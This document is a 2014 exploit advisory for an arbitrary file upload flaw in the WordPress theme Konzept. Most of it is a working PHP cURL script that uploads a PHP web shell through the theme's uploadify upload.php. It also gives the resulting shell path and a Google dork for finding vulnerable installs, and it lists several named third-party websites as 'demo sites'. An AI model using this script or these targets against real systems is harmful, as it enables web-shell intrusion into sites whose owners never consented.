Exploit Title : WordPress Theme Konzept Arbitrary File Upload Vulnerability

Exploit Author : NULL_Pointer

Contact : https://www.facebook.com/xenith.gianni

Date : 19/09/2014

Vendor Homepage : https://github.com/nzajt/New-Life-Office/tree/master/dev/wp-content/themes/konzept

Version: 1.0

Google Dork : inurl:/wp-content/themes/konzept/

Tested on : Linux, Windows 7

--------------------------------------------------------------

WordPress Theme Konzept suffers from Arbitrary File Upload Vulnerability.

Exploit :

<?php

$url = "http://127.0.0.1"; // put URL Here
$post = array
(
        "file" => "@null_pointer.jpg",
        "name" => "null_pointer.php"
);

$ch = curl_init ("$url/wp-content/themes/konzept/includes/uploadify/upload.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);

echo $data;

?>

Shell Path : http://127.0.0.1/wp-content/themes/konzept/includes/uploadify/uploads/null_pointer.php

Prof Video : http://www.youtube.com/watch?v=g7RaR3bCMag

Demo Sites :

http://www.ladepro.fr
http://getawayproductions.fr
http://www.victor-remere.fr
http://www.biceps-graphicdesign.fr

# C147CCAFF3C95942   1337day.com [2014-09-19]   3326DEF0807D8448 #